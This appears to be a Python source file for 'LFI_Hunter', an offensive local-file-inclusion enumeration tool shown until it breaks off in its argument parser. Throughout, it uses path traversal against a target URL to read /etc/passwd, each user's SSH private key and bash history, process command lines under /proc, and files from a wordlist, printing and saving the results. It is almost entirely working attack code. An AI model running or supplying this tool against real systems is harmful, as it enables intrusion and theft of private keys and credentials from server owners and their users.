+{"seq_id":"25409237424","text":"from multiprocessing import Pool\nimport requests\nimport argparse\nimport signal\nimport re\n\nclass LFI_Hunter():\n def __init__(self,url,file,lfi,pid,output_file,threads,header,cookie,user_agent,proxy):\n self.url = url\n self.file = file\n self.lfi = lfi\n self.pid = pid\n self.output_file = output_file\n self.check = self.size_check()\n self.threads = threads\n self.header = header\n self.cookie = cookie\n self.user_agent = user_agent\n self.proxy = proxy\n\n self.headers,self.proxy_set = self.create_headers()\n self.set_processes_wordlist()\n self.set_processes_procs()\n self.get_history()\n self.get_keys()\n\n def create_headers(self):\n headers = {\n \"Connection\":\"close\"\n }\n\n proxy_set = {}\n\n if args.a:\n headers[\"User-Agent\"] = self.user_agent\n\n if args.p:\n proxy_set = {\n \"http\": \"http://\" + self.proxy\n }\n \n if args.c:\n headers['Cookie'] = self.cookie\n\n if args.H:\n header_list = self.header.split(': ')\n list_length = len(header_list) - 1 \n for each_header in range(0,list_length):\n headers[header_list[each_header]] = header_list[each_header + 1]\n\n return headers,proxy_set\n \n def size_check(self):\n requests.packages.urllib3.disable_warnings()\n if args.o:\n file_write = open(self.output_file,\"w\")\n file_write.close()\n\n check = self.url + self.lfi + \"/9fX1SxbT61qUDQKjpDWo8ApV3YTVLpz5ThM3wJ6XOqlaz\"\n req_lfi = requests.get(check, allow_redirects = False, verify=False)\n page_size = len(req_lfi.text)\n\n return page_size\n\n def write_output(self,line1,line2,line3):\n print(line1)\n print(line2)\n print(line3)\n out_file = open(self.output_file,'a')\n out_file.write(line1)\n out_file.write(\"\\n\")\n out_file.write(line2)\n out_file.write(line3)\n out_file.write(\"\\n\")\n out_file.close()\n\n def get_keys(self):\n requests.packages.urllib3.disable_warnings()\n find_users = self.url + self.lfi + \"/etc/passwd\"\n req_lfi = requests.get(find_users, allow_redirects = False, verify=False)\n search = re.findall(\"/home/(.*):/bin/\",req_lfi.text)\n \n for each_user in search:\n print(\"Searching for SSH keys for user(s) \" + each_user)\n ssh_payload = self.url + self.lfi + \"/home/\" + each_user + \"/.ssh/id_rsa\"\n req_ssh = requests.get(ssh_payload, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n \n if len(req_ssh.text) > self.check:\n line1 = \"Found: \\x1b[6;30;42mSSH Keys for \" + each_user.strip() + \"\\x1b[0m\"\n line2 = \"\\n\" + req_ssh.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n \n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n else:\n print(\"No SSH keys found for user(s) \" + each_user.strip())\n print(\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\")\n\n def get_history(self):\n requests.packages.urllib3.disable_warnings()\n find_users = self.url + self.lfi + \"/etc/passwd\"\n req_lfi = requests.get(find_users, allow_redirects = False, verify=False)\n search = re.findall(\"/home/(.*):/bin/\",req_lfi.text)\n \n for each_user in search:\n print(\"Searching for history files for user(s) \" + each_user)\n ssh_payload = self.url + self.lfi + \"/home/\" + each_user + \"/.bash_history\"\n req_ssh = requests.get(ssh_payload, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n \n if len(req_ssh.text) > self.check:\n line1 = \"Found: \\x1b[6;30;42mHistory File for \" + each_user.strip() + \"\\x1b[0m\"\n line2 = \"\\n\" + req_ssh.text + \"\\n\"\n line3 = 
\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n \n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n else:\n print(\"No history file found for user(s) \" + each_user.strip())\n print(\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\")\n\n def set_processes_wordlist(self):\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(processes=int(self.threads)) \n signal.signal(signal.SIGINT, original_sigint_handler)\n\n wordlist = []\n with open(self.file,'r') as wordlist_file: \n for each_word in wordlist_file: \n wordlist.append(each_word.rstrip())\n\n try:\n start = pool.map_async(self.lfihunt,wordlist)\n except KeyboardInterrupt:\n pool.terminate()\n else:\n pool.close()\n pool.join()\n\n def set_processes_procs(self):\n print(\"Searching for running processes in /proc/$(PID)/cmdline\")\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(processes=int(self.threads)) \n signal.signal(signal.SIGINT, original_sigint_handler)\n\n wordlist = []\n for each_pid in range(0,int(self.pid)): \n wordlist.append(each_pid)\n\n try:\n start = pool.map_async(self.get_procs,wordlist)\n except KeyboardInterrupt:\n pool.terminate()\n else:\n pool.close()\n pool.join()\n\n def get_procs(self,each_pid):\n requests.packages.urllib3.disable_warnings()\n process = self.url + self.lfi + \"/proc/\" + str(each_pid) + \"/cmdline\"\n req_proc = requests.get(process, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n if len(req_proc.text) > self.check:\n line1 = \"Process: \\x1b[6;30;42m/proc/\" + str(each_pid) + \"/cmdline\\x1b[0m\"\n line2 = \"\\n\" + req_proc.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n def lfihunt(self,each_line):\n requests.packages.urllib3.disable_warnings() \n req_lfi = requests.get(self.url + self.lfi + each_line, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n\n if len(req_lfi.text) > self.check:\n line1 = \"File: \\x1b[6;30;42m\" + each_line + \"\\x1b[0m\"\n line2 = \"\\n\" + req_lfi.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='LFI Enumeration Tool')\n parser.add_argument('-u', metavar='', help='Example: -u http://lfi.location/?parameter=', required=True)\n parser.add_argument('-w', metavar='',help=\"Example: -w unix.txt\", required=True)\n parser.add_argument('-l', metavar='',help=\"Example: -l ../../../../../\", required=True)\n parser.add_argument('-pid', metavar='',default='1000',help=\"Default is 1000. Example: -pid 2000\", required=False)\n parser.add_argument('-o', metavar='